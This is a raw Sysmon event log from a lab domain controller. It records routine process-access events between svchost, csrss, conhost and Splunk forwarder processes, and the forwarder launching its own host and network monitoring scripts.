10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.630{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.522{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 